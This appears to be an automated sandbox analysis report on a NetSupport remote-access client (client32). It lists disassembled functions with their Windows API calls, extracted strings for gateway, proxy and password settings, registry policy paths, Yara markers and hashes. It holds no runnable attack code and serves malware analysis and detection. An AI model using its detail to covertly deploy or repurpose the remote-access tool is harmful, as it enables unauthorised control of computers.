                                                        Function 1106F530 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 1106F615
                                                        • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 1106F61B
                                                        • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 1106F621
                                                        • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 1106F62A
                                                        • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 1106F630
                                                        • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 1106F636
                                                        • _strncpy.LIBCMT ref: 1106F698
                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 1106F6FF
                                                        • CreateThread.KERNEL32(00000000,00004000,Function_0006B810,00000000,00000000,?), ref: 1106F79C
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1106F7A3
                                                        • SetTimer.USER32(00000000,00000000,000000FA,1105EF40), ref: 1106F7E7
                                                        • std::exception::exception.LIBCMT ref: 1106F898
                                                        • __CxxThrowException@8.LIBCMT ref: 1106F8B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                        • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                        • API String ID: 703120326-1497550179
                                                        • Opcode ID: cc7903dda24a66739fd7a13bbda9e0872c732d56e2d593b364654cf261e7dd3c
                                                        • Instruction ID: 100f990ebe536f4ae5a6f41c30aeaeafdd91ca27a0176a8e63e6253bf368b8ee
                                                        • Opcode Fuzzy Hash: cc7903dda24a66739fd7a13bbda9e0872c732d56e2d593b364654cf261e7dd3c
                                                        • Instruction Fuzzy Hash: 0FB1B5B5A00745AFDB10CF64CD84FDAF7F8BB48708F4085A9E60997281E7B0BA44CB65
                                                        Function 11129920 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                          • Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                          • Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        • PostMessageA.USER32(0001042A,000006CF,00000007,00000000), ref: 11129AFF
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SetWindowTextA.USER32(0001042A,00000000), ref: 11129BA7
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129C6C
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11129C8C
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129C9A
                                                        • SetForegroundWindow.USER32(00000000), ref: 11129CC8
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129CD7
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129D28
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129D35
                                                        • EnableWindow.USER32(0001042A,00000000), ref: 11129D49
                                                        • EnableWindow.USER32(0001042A,00000000), ref: 11129CAF
                                                          • Part of subcall function 111228E0: ShowWindow.USER32(0001042A,11129D52,?,11129D52,00000007,?,?,?,?,?,00000000), ref: 111228EE
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129D5D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$EnableVisible$Foreground$CloseMessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                        • API String ID: 4194384052-3803836183
                                                        • Opcode ID: e43bb21f673ef14eee2c9dbecfac9de94a1951a9e343f6d3e521405f1ec23232
                                                        • Instruction ID: 8305938ea656916a4b1fbafb187925e2d273a1d2ad477454ab730d3f5b69f352
                                                        • Opcode Fuzzy Hash: e43bb21f673ef14eee2c9dbecfac9de94a1951a9e343f6d3e521405f1ec23232
                                                        • Instruction Fuzzy Hash: D3C1E575A012799FEF01DBA8DD84B5EF7A6AB4038CF604035ED199B2C4FB75A804CB91
                                                        Function 6C808270 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 189libraryloadernetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 6C80830B
                                                        • GetTickCount.KERNEL32 ref: 6C808365
                                                        • InterlockedExchange.KERNEL32(?,-6C848150), ref: 6C808376
                                                        • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6C8083AA
                                                        • WSAGetLastError.WSOCK32(?,00000000,?), ref: 6C8083CF
                                                        • InterlockedIncrement.KERNEL32(?), ref: 6C808491
                                                        Strings
                                                        • xx %02x, xrefs: 6C808319
                                                        • Error send returned 0 on connection %d, xrefs: 6C808445
                                                        • InternetWriteFile, xrefs: 6C8083A4
                                                        • Error %d sending HTTP request on connection %d, xrefs: 6C80842B
                                                        • Error %d writing inet request on connection %d, xrefs: 6C8083D9
                                                        • SendHttpReq failed, not connected to gateway!, xrefs: 6C8082C1
                                                        • %02x %02x, xrefs: 6C808305
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$AddressCountErrorExchangeIncrementLastProcTickwsprintf
                                                        • String ID: %02x %02x$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$InternetWriteFile$SendHttpReq failed, not connected to gateway!$xx %02x
                                                        • API String ID: 642105747-610509312
                                                        • Opcode ID: 2ac32dfb27fd76595202d7ddf9abe12999a6f6fc691531fd5b1d9b6c4d3b27f3
                                                        • Instruction ID: 5452a649523cb60f7993c90d64967079740d84bfc9f2eb055cd8df9e4fa18ff2
                                                        • Opcode Fuzzy Hash: 2ac32dfb27fd76595202d7ddf9abe12999a6f6fc691531fd5b1d9b6c4d3b27f3
                                                        • Instruction Fuzzy Hash: 66619171E006189FDB30CFA8DE44A9EB3B4BB45318F118A6AE819A7B41D730AD55CFD0
                                                        Function 1102EA18 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 186librarysynchronizationloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 1102EB44
                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EB5D
                                                        • LoadLibraryA.KERNEL32(User32.dll,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EBBA
                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1102EBF8
                                                        • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC0B
                                                        • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC3C
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC49
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC54
                                                        • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleLibraryMutex$AddressCreateErrorFreeLastLoadObjectOpenProcSingleWait
                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$User32.dll$_debug\trace$_debug\tracefile$istaUI$B`
                                                        • API String ID: 2633444001-3660454586
                                                        • Opcode ID: ae551b03b65906b97426a76e9e5f6dedac2389bce539edba93c32e175c85bc09
                                                        • Instruction ID: 839cbd99583855d240305defeb44377099afaa71c82f4bb6bc46c0958452e9e8
                                                        • Opcode Fuzzy Hash: ae551b03b65906b97426a76e9e5f6dedac2389bce539edba93c32e175c85bc09
                                                        • Instruction Fuzzy Hash: 6A61C474E412259EDB50DFA58C88BDEFBF4AF44318F5040ADE91AA3280EB706A44CF61
                                                        Function 1102C925 Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 1102C9AE
                                                        • wsprintfA.USER32 ref: 1102C9C6
                                                        • _strncpy.LIBCMT ref: 1102CA80
                                                        • CharUpperA.USER32(494126,?,?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 1102CAB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$CharUpper_strncpy
                                                        • String ID: $session$$%02d$%s.%02d$%session%$%sessionname%$18/03/14 09:15:42 V12.01F3$494126$IsA()$Warning: Unexpanded clientname=<%s>$client32 dbi %hs$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d
                                                        • API String ID: 2270809062-3036655208
                                                        • Opcode ID: 57a04b5987526aa2e0f8655635961a358d46d212241b8f1881ee851afd3fe5b4
                                                        • Instruction ID: a7d590d3ef6a482f5e404058edd8043c7c0bcb645db31710f61f6096d8bb4a38
                                                        • Opcode Fuzzy Hash: 57a04b5987526aa2e0f8655635961a358d46d212241b8f1881ee851afd3fe5b4
                                                        • Instruction Fuzzy Hash: AB518079E10526AFDB15EB90DC84FEEF378AF45208F4481D9F94967240EB306A44CFA2
                                                        Function 6C8119E0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 592COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                        • API String ID: 2111968516-2157635994
                                                        • Opcode ID: 46f13617892454cc5591b67f5a66217e128f07c53b36da442f4a46b8191178a8
                                                        • Instruction ID: cde0167cfc4d50e2251aa674f27122ed0c6e0f1680b16357209ce40a529eab1c
                                                        • Opcode Fuzzy Hash: 46f13617892454cc5591b67f5a66217e128f07c53b36da442f4a46b8191178a8
                                                        • Instruction Fuzzy Hash: ED22A8B2A042696FDB30CB54CD80EEAB3BDBB5A314F048AD9E54967A40D7315F88CF51
                                                        Function 11080710 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,82E0FB89,030634C0,030634B0,?,00000000,11170D2C,000000FF,?,1102FD62,030634C0,00000000,?,?,?), ref: 11080745
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E
                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108076B
                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108077F
                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11080793
                                                        • wsprintfA.USER32 ref: 1108081B
                                                        • wsprintfA.USER32 ref: 11080832
                                                        • wsprintfA.USER32 ref: 11080849
                                                        • CloseHandle.KERNEL32(00000000,11080570,00000001,00000000), ref: 1108099A
                                                          • Part of subcall function 11080380: CloseHandle.KERNEL32(?,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 11080398
                                                          • Part of subcall function 11080380: CloseHandle.KERNEL32(?,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 110803AB
                                                          • Part of subcall function 11080380: CloseHandle.KERNEL32(?,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 110803BE
                                                          • Part of subcall function 11080380: FreeLibrary.KERNEL32(00000000,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 110803D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                        • API String ID: 4263811268-2492245516
                                                        • Opcode ID: 900c07cf632ceed795f6062e6b5d6e6eb4405877d5972ec200cb62fa1573293b
                                                        • Instruction ID: 267f9520f853b8db1f70e2f308a13b3e425cee8e127691eb8cf8de9d489763be
                                                        • Opcode Fuzzy Hash: 900c07cf632ceed795f6062e6b5d6e6eb4405877d5972ec200cb62fa1573293b
                                                        • Instruction Fuzzy Hash: A471A2B5E04709AFE710CF75CC41BDAFBE4EB45314F10456AE99AD7284EB74A540CB90
                                                        Function 1102ADC0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102790: SetEvent.KERNEL32(00000000), ref: 111027B4
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102AE05
                                                        • GetTickCount.KERNEL32 ref: 1102AE2A
                                                          • Part of subcall function 110C57C0: __strdup.LIBCMT ref: 110C57DA
                                                        • GetTickCount.KERNEL32 ref: 1102AF24
                                                          • Part of subcall function 110C6420: wvsprintfA.USER32(?,?,?), ref: 110C644B
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102B01C
                                                        • CloseHandle.KERNEL32(?), ref: 1102B038
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                        • API String ID: 596640303-3003987893
                                                        • Opcode ID: 8ca583927dd2f4404de96ed486692433cf799d3d2d5b64839f56d11960716dfa
                                                        • Instruction ID: 57a4b4366f92f46f89141de7e1f67135d68c38a19d5041ed4b9abebe1d7e3f86
                                                        • Opcode Fuzzy Hash: 8ca583927dd2f4404de96ed486692433cf799d3d2d5b64839f56d11960716dfa
                                                        • Instruction Fuzzy Hash: 6C819E78E00606DFDB05DBA5CC84FEEF7B5AF59708F508258E92167280DB34BA05CBA1
                                                        Function 1105CFC0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1105D01A
                                                          • Part of subcall function 1105CA00: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1105CA3C
                                                          • Part of subcall function 1105CA00: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 1105CA94
                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1105D06B
                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 1105D125
                                                        • RegCloseKey.ADVAPI32(?), ref: 1105D141
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Enum$Open$CloseValue
                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                        • API String ID: 2823542970-1528906934
                                                        • Opcode ID: 7352ea1272703dd1873893fc259baceee137f98d8ff17c55a767f436621e123b
                                                        • Instruction ID: 49029f40789f99adc4781eb7408dcc231794a4b951f95dab0d46ef244fca2f87
                                                        • Opcode Fuzzy Hash: 7352ea1272703dd1873893fc259baceee137f98d8ff17c55a767f436621e123b
                                                        • Instruction Fuzzy Hash: 7F418175E00229ABDB61CB158C85FEEF7B8EB45708F5041D9FA49A6140DAB06E818FA1
